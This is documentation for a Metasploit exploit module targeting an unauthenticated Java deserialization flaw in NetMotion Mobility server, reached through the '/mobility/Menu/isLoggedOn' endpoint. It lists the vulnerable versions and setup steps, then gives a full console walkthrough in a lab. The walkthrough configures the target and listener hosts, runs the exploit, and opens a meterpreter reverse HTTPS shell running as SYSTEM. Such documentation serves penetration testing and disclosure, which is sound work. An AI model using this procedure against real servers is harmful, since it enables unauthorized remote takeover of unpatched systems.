## Vulnerable Application

### Description

This module exploits an unauthenticated Java deserialization in the
NetMotion Mobility server's `MvcUtil.valueStringToObject()` method, as
invoked through the `/mobility/Menu/isLoggedOn` endpoint, to execute
code as the `SYSTEM` account.

Mobility server versions 11.x before 11.73 and 12.x before 12.02 are
vulnerable. Tested against 12.01.09045 on Windows Server 2016.

### Setup

Follow the [Mobility System Administrator Guide - v12.0x], paying
particular attention to the [Basic System Requirements for All Server
Components]. I used the `Mobility_server_12.01_Win2016_release.exe`
installer.

[Mobility System Administrator Guide - v12.0x]:
https://help.netmotionsoftware.com/support/docs/MobilityXG/1200/help/mobilityhelp.htm

[Basic System Requirements for All Server Components]:
https://help.netmotionsoftware.com/support/docs/MobilityXG/1200/help/mobilityhelp.htm#page/Mobility%2520Server%2Fintro.01.09.html%23

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Scenarios

### NetMotion Mobility 12.01.09045 on Windows Server 2016

```
msf6 > use exploit/windows/http/netmotion_mobility_mvcutil_deserialization
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > options

Module options (exploit/windows/http/netmotion_mobility_mvcutil_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set rhosts 172.16.57.3
rhosts => 172.16.57.3
msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > set lhost 172.16.57.1
lhost => 172.16.57.1
msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > run

[*] Started HTTPS reverse handler on https://172.16.57.1:8443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. NetMotion Mobility 12.01.09045 is unpatched.
[*] Executing windows/x64/meterpreter/reverse_https (PowerShell Stager)
[*] https://172.16.57.1:8443 handling request from 172.16.57.3; (UUID: s66tryd9) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (172.16.57.1:8443 -> 127.0.0.1) at 2021-07-08 21:25:22 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-MIUE6PRQH9F
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```
